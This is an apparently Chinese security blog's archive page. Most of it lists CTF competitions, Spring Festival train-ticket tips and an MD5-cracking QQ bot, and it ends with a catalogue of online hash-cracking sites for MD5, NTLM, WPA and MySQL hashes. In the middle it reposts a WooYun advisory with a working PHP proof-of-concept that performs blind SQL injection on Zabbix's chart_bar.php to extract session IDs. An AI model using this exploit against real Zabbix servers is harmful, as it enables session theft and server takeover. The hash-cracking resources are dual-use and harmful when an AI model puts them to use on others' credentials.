Author Archives: admin

0CTF

竞赛简介

第二届0CTF,暨首届XCTF联赛上海站选拔赛,由上海交通大学信息网络安全协会、0ops战队组织,分为线上初赛和线下决赛。
线上初赛采取Jeopardy的模式,时间为48小时。从xctftime注册的国内队伍中取前十二名进入线下决赛。

竞赛官网

https://ctf.0ops.sjtu.cn/

竞赛时间表

2015年3月28日 8:00 am (GMT+8) – 2015年3月30日 8 am (GMT+8)

竞赛奖品

初赛奖品和决赛奖品分开设置

初赛奖品

第一名:8192 元

第二名~第三名:4096 元

第四名~第五名:2048 元

第六名~第十名:1024 元

竞赛WriteUp

2015

wait …

密码破解&QQ机器人

机器人的添加方法:
1.先加QQ机器人为好友 一号机器人(满):3067620432、二号机器人:2878647263。
2.把QQ机器人拉进群。

之前一直有这方面的想法。但是一直因为技术方面的原因,没有实现。这两天又去网上逛了下。发现QQ机器人这方面的技术已经挺成熟了。
然后就根据 密码解密大全 里的网站,做了一个QQ机器人。

如果想测试QQ机器人的解密能力,请移步到NaviSec解密平台NaviSec解密平台是QQ解密机器人的分支项目。

说明:
1.目前QQ机器人能破解16位和32位的md5密码。支持更多的密码类型和更高的破解能力是我们未来的主要方向。
2.在查询人数多的时候,有可能被腾讯“禁言”一段时间。
3.机器人只会在大家发md5的时候出来解密,平常的时候不会参与讨论。
4.对于“恶意”刷机器人的群,我们有信誉机制。进入名单后,会本群hash的解密频率有限制。

bug反馈:
1.http://weibo.com/navisec/
2.QQ群:53797844

这里是使用的效果:

20141129224744

历史:
2015/08/27 机器人升级,提高解密能力。
2015/01/09 对于持续30天没有解密需求的群,机器人会自动退群的。
2014/12/09 自己做了个查询库。
2014/12/05 因为消息太多,为了避免被禁言,对回复算法做了调整。同群、同hash5,分钟解密一次。同QQ,同hash,5分钟解密一次。未来将统计出每个群的破解需求量,设定峰值,以免“禁言”影响其他的群。
2014/11/30 cmd5.com不打算开放API接口。目前使用的是由 Wd0g 大牛 提供的somd5接口。大牛的博客是 www.wd0g.com ,欢迎大家光顾。

2015年春运

独在异乡为异客,每逢佳节倍思亲。春节,我在乎的不是焰火,在乎的不是酒席,我在乎的不是休息,我、只想回家。

休假方案

1
2

计算行程

抢票日期计算器

输入你想在哪一天买票,可以计算抢票的日子。http://12306.360.cn/#show

2015年春运火车票预售期时间表

127214526_14160366139991n

软件

12306订票助手

http://www.fishlee.net/

360抢票插件

如何在chrome浏览器中使用360抢票

按照文章作者说的没利用成功。可能是我chrome版本比较高的原因。开启开发者模式也没用

抢票浏览器

ps:大家都懂得,自备虚拟机,免得被莫名其妙的安装上xx软件。

1、360安全浏览器抢火车票专版

http://dl.360safe.com/se/360se6_getticket.exe

2、猎豹浏览器春运抢票版

http://dl.liebao.cn/coop/KSBrowser_12306.exe

3、搜狗12306专版浏览器

http://download.ie.sogou.com/special/sogouexplorerchunyun2.exe

经验

说点自己买票的经验。如果车票抢不到,那就提前买几站。比如上海到北京有个车叫G1,中间有A->B->C的停靠。如果直达的买不到,那就买到C的。再不行买到B的。“先上车后补票”,这就是精髓。

年货

过年免不了走亲访友,过年时物价上涨的厉害。还是提前备点货吧。

万能的大淘宝

京东举办的活动挺多的,有些时候确实便宜挺多。

吃货们都懂的。一号店

年末了,不要忘了孝敬下家里的妈妈、犒劳犒劳可爱的“她”。唯品会聚美优品

如果年末要买家电,那就来易迅

过年了,酒肯定是少不了的。线下多贵就不说了。酒仙网做了挺久的,去年就在这买的酒。

其他年货

最后

看到的文章的朋友,请随手转发到微博、空间,传播下正能量。技术宅改变世界。

Zabbix的前台SQL注射漏洞0day

from http://wooyun.org/bugs/wooyun-2014-072075

在zabbix前端存在一个SQL注射漏洞,由于zabbix前台可以在zabbix的server和client进行命令执行,所以这会导致很严重的后果。

在 /chart_bar.php 的163行代码 获取了一个来自GET,POST,COOKIE的值itemid。

$itemid = $item['itemid'];

最后这个参数进到了SQL查询的过程

http://wooyun.org/upload/201408/121704045cbce0027d8f0fd26109cf834a6694d5.jpg

在同一个文件内的$periods参数也存在一样的问题,导致了一样的SQL注射漏洞。

下方是poc

 

<?php
run_sql("SELECT sessionid from zabbix.sessions where userid in (select userid from zabbix.users) limit 1");
function run_sql($sql) {
    $url = 'http://www.zabbix.org/zabbix/chart_bar.php';
    $data = 'config=1&items[][itemid]=' . rawurlencode('6 and 1=2#');
    $true = strlen(post($url, $data));
    //’“≥§∂»
    for ($i = 0; $i <= 32; $i++) {
        //echo $i."\r\n";
        $data = 'config=1&items[][itemid]=' . rawurlencode('6 and length((' . $sql . ')) = ' . $i . '#');
        $test = strlen(post($url, $data));
        if ($test < ($true - 200)) {
            $length = $i;
            break;
        }
    }
    echo 'Length:' . $length . "\r\n";
    echo 'Result:';
    $chars = array();
    if ($length) {
        for ($l = 0; $l < $length; $l++) {
            $char_list = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@.?-_\/!$%^&*()~';
            for ($c = 0; $c < strlen($char_list); $c++) {
                $data = 'config=1&items[][itemid]=' . rawurlencode('6 and ord(substring((' . $sql . '),' . ($l + 1) . ',1)) = ' . ord($char_list{$c}) . '#');
                $test = strlen(post($url, $data));
                if ($test < ($true - 200)) {
                    echo $char_list{$c};
                    $chars[$l] = $char_list{$c};
                    break;
                }
            }
        }
    }
}
echo "\n";
function post($uri, $data) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $uri);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    $return = curl_exec($ch);
    curl_close($ch);
    return $return;
}
?>

XCTF

竞赛简介

XCTF全国网络安全技术对抗联赛启动新闻发布会在北京盛大召开。XCTF全国联赛是由中国网络空间安全协会(筹)竞评演练工作组主办的网络安全中立赛事平台,由国内首个并多次入围全球DEFCON CTF总决赛圈的蓝莲花团队总体组织,国内顶尖安全团队Keen Team参与协办。

竞赛官网

http://www.xctf.org.cn/

参赛网址: https://time.xctf.org.cn/

分赛场:
XCTF 杭州(杭电)站选拔赛决赛

竞赛WriteUp

2014

XCTF杭州站-HCTF2014 Writeup

SCTF Writeup

竞赛简介

XCTF全国网络安全技术对抗联赛启动新闻发布会在北京盛大召开。XCTF全国联赛是由中国网络空间安全协会(筹)竞评演练工作组主办的网络安全中立赛事平台,由国内首个并多次入围全球DEFCON CTF总决赛圈的蓝莲花团队总体组织,国内顶尖安全团队Keen Team参与协办。

竞赛官网

http://www.xctf.org.cn/

参赛网址: https://time.xctf.org.cn/

分赛场:
XCTF 杭州(杭电)站选拔赛决赛

竞赛WriteUp

2014

XCTF杭州站-HCTF2014 Writeup

SSCTF

竞赛简介

SSCTF全国网络攻防大赛由西安四叶草信息科技有限公司独立主办,是面向全国网络安全爱好者的网络攻防比赛,旨在增进网络安全技术交流,强化技术能力,挖掘网络安全优秀技术人才,为我国的信息安全建设贡献一份力量。

大赛分为线上答题和线下决赛。线上为初步选拔环节,各位参赛选手进行解题获取Flag来获得分数,分数靠前的队伍将邀请参加线下决赛,线下决赛分为实战沙盒与攻防对抗,真正完全再现黑客攻防过程。

SSCTF秉承最接近实战的比赛理念,努力办成最富特色的网络安全攻防比赛。

竞赛官网

http://ctf.seclover.com/

竞赛WriteUp

官方writeup: http://writeup.ctf.seclover.com

2014

[安全脉搏]SSCTF2014 QUAL WriteUp
SSCTF决赛所见闻
2014 ssctf 线下决赛writeup

360CTF

竞赛简介

奇虎360作为中国互联网最大的安全公司,一直以维护用户的上网安全,提高全体网民的安全意识为己任。 360杯全国大学生信息安全技术大赛如今迎来第二届,此赛事致力于增强大学生对网络安全知识的兴趣和网络安全意识,提高大学生网络攻防实战能力,培养信息安全方面的高素质人才。

此次大赛规模盛大,面向华北,华东,华南,华中,东北,西北,西南七大赛区,以北京邮电大学,杭州电子科技大学,福州大学,华中科技大学,吉林大学,西安电子科技大学,重庆邮电大学为赛点进行预赛选出高校中最强的安全团队。这七支最强的团队,将参加8月底在北京举行的安全之旅总决赛,不仅会获得高额奖品,拿到360实习offer (应届毕业生可进入360应届校招绿色通道),决赛的优胜队伍更有机会参加9月份由360举办的全国互联网安全大会,领略全球顶尖安全人员的风采。

群雄争霸,孰能称王,究竟哪所高校的哪支团队,将会是高校中信息安全专业的最强团队,让我们拭目以待!

竞赛官网

http://is.campus.360.cn/

竞赛WriteUp

2014

第二届360杯全国大学生信息安全技术大赛 Reverse 80 writeup
第二届360杯全国大学生信息安全技术大赛 加密解密 writeup
第二届360杯全国大学生信息安全技术大赛 数字取证40 writeup
第二届 360 杯全国大学生信息安全技术大赛总结
360 CTF Writeup
360全国大学生信安技术大赛记录

在线解密大全

如果发现某些网站出错,大家可以留言提醒我们进行改正。如果发现有好的网站没收录进来,也可以在下方留言。谢谢大家支持!

MD5

cmd5.com md5.com.cn xmd5.com crackstation.net cracker.blackbap.org
md5.net hash-killer Somd5 md5online.net hashtoolkit
md5this cloudecrypt md5crack www.2d5.net hashkiller.co.uk
md5.im md5.syue.com hash-cracker(GFW) hashcrack.in hashchecker.de
requnix.tk md5online.org(GFW) stringfunction onlinehashcrack md5.gromweb.com
netmd5crack md5-hash md5decrypt.org md5decrypter md5.my-addr.com
offensive-security md5decryption md5cracker.org

SHA1

cmd5.com crackstation hashtoolkit md5.im hash-cracker(GFW)
stringfunction cloudecrypt onlinehashcrack hashcrack.in hashkiller.co.uk

MD5(MD5)

cmd5.com xmd5.com crackstation cloudecrypt hashcrack.in

LM-HASH

objectif-securite crackstation cloudecrypt onlinehashcrack

NTLM-HASH

crackstation cmd5.com hashkiller.co.uk question-defense
hash-cracker(GFW) cloudecrypt md5.im onlinehashcrack

WPA

gpuhash.me question-defense wpacracker isc.sans.edu onlinehashcrack

MYSQL5

cmd5.com onlinehashcrack hashcrack.in crackstation

MYSQL 4.1/MYSQL323

cmd5.com onlinehashcrack hashcrack.in

Md5(WordPress)

cmd5.com md5.im

VB;Discuz/md5(md5($pass).$salt)

cmd5.com md5.im

SHA256

crackstation hashcrack.in cmd5.com hashtoolkit

SHA512

crackstation hashtoolkit wpacracker cloudecrypt

Serv-U

xmd5.com